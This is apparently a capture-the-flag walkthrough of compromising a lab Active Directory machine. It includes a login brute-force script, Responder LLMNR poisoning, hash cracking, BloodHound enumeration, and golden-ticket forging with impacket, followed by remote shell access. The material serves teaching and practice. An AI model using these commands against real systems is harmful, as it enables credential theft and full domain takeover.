# DC04

Download it and unzip, and configure the networks like in this machine DC01. ## Enumeration: We will smb sweep to find its IP: ```bash netexec smb 10.0.2.0/24 ```

So we will add it to the /etc/hosts:

Now lets start nmap scan to scan all tcp ports: ```bash sudo nmap -sCV -p- --min-rate 4000 -oN nmap/allports -vv soupedecode.local ```

Its an active directory machine, and we have a web server running on it. We can dir and vhost fuzzing: ```bash gobuster dir -u http://soupedecode.local -w /usr/share/wordlists/dirb/common.txt -t 16 ```

But we have a lot of 403 with the same size, we can exclude the size in gobuster using `--exclude-length`:

Lets take a look at the server-info:

This file usually will discloses configuration information of the web server, we can find hidden directories or files or subdomains for example.

If we search a little bit we will find this subdomain.

Lets add it to the /etc/hosts. ## LLMNR poisoning to get NTLMv2 of websvc: We need credentials to authenticate:

Lets try some combinations of default credentials:

Invalid credentials with admin:admin.

Also there is not sqli. Lets get the format of body of the request, to start brute forcing:

I wrote this simple script that will help us to brute force this login form using a simple wordlist: ```python import requests url = 'http://heartbeat.soupedecode.local' end_point = '/login.php' session = requests.session() headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,' 'image/svg+xml,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate, br', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '29', 'Origin': 'http://heartbeat.soupedecode.local', 'Connection': 'keep-alive', 'Referer': 'http://heartbeat.soupedecode.local/login.php', 'Upgrade-Insecure-Requests': '1', 'Priority': 'u=0, i' } with open('/usr/share/seclists/Passwords/UserPassCombo-Jay.txt', 'r') as wordlist: words = wordlist.readlines() for username in words: username = username.strip() for password in words: password = password.strip() data = f'username={username}&password={password}' req = session.post(url=url + end_point, headers=headers, data=data) if 'Invalid username' in req.text: continue else: print(f'Valid Credentials: {username}:{password}') break ```

I restarted this machine more than one time, so the IP changed as you progress in reading this blog to 10.0.2.33. After a while we will get those credentials.

Here it is asking for IP, lets try SSRF:

I could not get to anything. But lets start responder and try to capture the ntlmv2: ```bash sudo reponder -I eth0 -dvw ```

We captured the websvc hash, we can crack it with hashcat: ```bash hashcat websvc.hash /usr/share/wordlists/rockyou.txt ```

Here we have the password cracked. Lets try to authenticate: ```bash netexec smb soupedecode.local -u websvc -p jordan23 ```

It says the password expired, so we can go to the logonui prompt to reset it:

The password has been change, lets try it out:

Finally we have valid credentials. Lets collect the domain data and do some bloodhound enumeration: ```bash bloodhound-python -u websvc -p Caesar3 -ns 10.0.2.33 -d soupedecode.local -dc dc01.soupedecode.local ```

For some reason we need to set a fake dns server for this to work: ```bash dnschef --fakeip 10.0.2.33 ```

And now re-execute the bloodhound command but instead our localhsot IP instead of the target IP:

Lets start bloodhound, but first we need to star the database that bloodhound can use: ```bash sudo neo4j start ```

After that we will go to that link and login as neo4j:neo4j, and reset the password, and will use the same credentials to authenticate in bloodhound: ```bash bloodhound ```

Drag and drop those json files into bloodhound:

I did not find anything could help us.

Nothing interesting in the home directory of the websvc user in the C share that we have read access to. ## Move Laterally to rtina979: Lets move on to dump other users: ```bash netexec smb soupedecode.local -u websvc -p Caesar3 --users > temp.txt ```

Grep the users out of that temp file: ```bash cat temp.txt | awk '{print $5}' > users.txt ```

If we extracted the description of the users, we will find this default password for a user:

Try to authenticate:

Also expired, so we can change the user using smbpasswd or impacket-changepasswd: ```bash impacket-changepasswd 'soupedecode.local'/'rtina979'@'soupedecode.local' -newpass 'Caesar3!' -altuser websvc -altpass Caesar3 ```

We changed the password successfully. ## Privilege Escalatio via Golden Ticket attack: Lets go back to the C share again to check the rtina979 home directory:

After doing enumeration in this share I found file called Report.rar: ```bash smbclient \\\\10.0.2.33\\C -U 'rtina979%Caesar3!' ```

Downloading it and trying to extract it: ```bash unrar x Report.rar ```

But its is encrypted with a password, we can use rar2john and then try to crack that hash to get the password for that archive: ```bash rar2john Report.rar > report.hash ``` ```bash john report.hash --wordlist=/usr/share/wordlists/rockyou.txt ```

Extract it again with that password:

We have a htm and bunch of js scripts.

If we open that .htm file in firefox: We will that it is a penetration testing report:

After some reading we will find the krbtgt hash to this target system, and companies usually do not change krbtgt hash because changing the password is not a simple task. Lets try to get a golden ticket with that krbtgt hash:

But before that we need to get the SID of the domain, so we can run impacket-lookupsid to get it: ```bash impacket-lookupsid soupedecode.local/rtina979:'Caesar3!'@10.0.2.33 ```

Now we will use impacket-ticketer to forge a ticket: ```bash impacket-ticketer -nthash "0f55cdc40bd8f5814587f7e6b2f85e6f" -domain-sid "S-1-5-21-2986980474-46765180-2505414164" -domain "soupedecode.local" "administrator" ```

We need to export it to a variable called KRB5CCNAME, and try to authenticate via impacket-wmiexec: ```bash export KRB5CCNAME=administrator.ccache ``` ```bash impacket-wmiexec administrator@dc01.soupedecode.local -k -no-pass -dc-ip 10.0.2.33 ```

We got clock skew too great because the time between our local machine is more than 5 minutes, so we can use ntpdate to sync the time, and rerun that impacket-wmiexec command.

Here is the root flag, you can find the user flag in the websvc home directory.